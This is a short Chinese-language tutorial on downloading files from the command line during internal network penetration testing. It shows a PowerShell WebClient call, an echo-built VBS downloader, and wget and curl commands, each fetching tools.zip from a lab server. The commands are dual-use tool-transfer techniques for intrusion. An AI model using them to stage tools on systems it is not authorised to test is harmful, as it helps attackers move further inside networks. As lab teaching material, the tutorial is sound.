在進行內網滲透時,根據不同的需求需要不同的文件下載,在圖形界面下操作時比較簡單的,但是必要時還是需要通過命令行進行文件下載,所以本篇文章就簡單介紹總結一些命令行文件下載的方式
命令行文件下載可以分為Windows和Linux兩種類型
Windows類型
使用powershell進行文件下載
powershell默認存在於windows高版本(7 8 10),對於低版本有另外一種方法,見VBS處
- 通過cmd打開powershell
C:\Users\yonghu>start powershell
- 輸入命令
$client = new-object System.Net.WebClient
$client.DownloadFile('#1', '#2')
#1:要下載文件的出處
#2:文件保存位置(注意反斜杠 \ )
實例
實驗環境:
win10:使用powershell
win2003 :搭建服務器 IP:192.168.31.123
假設服務器上有個tools.zip文件
win10 下打開powershell
輸入命令進行文件下載
可以在目錄下看到下載了該文件
使用VBS腳本進行文件下載
這種情況對應於沒有powershell的低版本windows
- 通過cmd寫vbs文件
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>hhh.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>hhh.vbs
echo Post.Open "GET","http://192.168.31.123/tools.zip",0 >>hhh.vbs
echo Post.Send() >>hhh.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>hhh.vbs
echo aGet.Mode = 3 >>hhh.vbs
echo aGet.Type = 1 >>hhh.vbs
echo aGet.Open() >>hhh.vbs
echo aGet.Write(Post.responseBody) >>hhh.vbs
echo aGet.SaveToFile "c:\tools.zip",2 >>hhh.vbs
hhh.vbs文件里面的內容就是
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.31.123/tools.zip",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\tools.zip",2
執行該vbs腳本,即可
實例
實驗環境:
win2003-1:搭建服務器 IP:192.168.31.123
win2003-2:利用vbs腳本下載文件
服務器上有tools.zip文件
使用cmd命令進行輸入,最后的腳本代碼如下:
執行該vbs腳本,下載得到tools.zip文件
Linux類型
在Linux中,有內置的wget和curl命令,實現文件的下載
通過wget命令進行文件下載
- 在命令行窗口輸入指令
wget http://xxx.xxx
實例
實驗環境:
win2003:搭建服務器 IP:192.168.31.123
kali-Linux: Linux系統下載文件(我這電腦目前就安了kali,就將就下)
輸入指令 回車即可 得到文件
通過curl命令進行文件下載
- 輸入指令
curl http://192.168.31.123/tools.zip >> tools.zip
實例
win2003:搭建服務器 IP:192.168.31.123
kali-Linux: Linux系統下載文件(我這電腦目前就安了kali,就將就下)
輸入指令 回車即可 得到文件
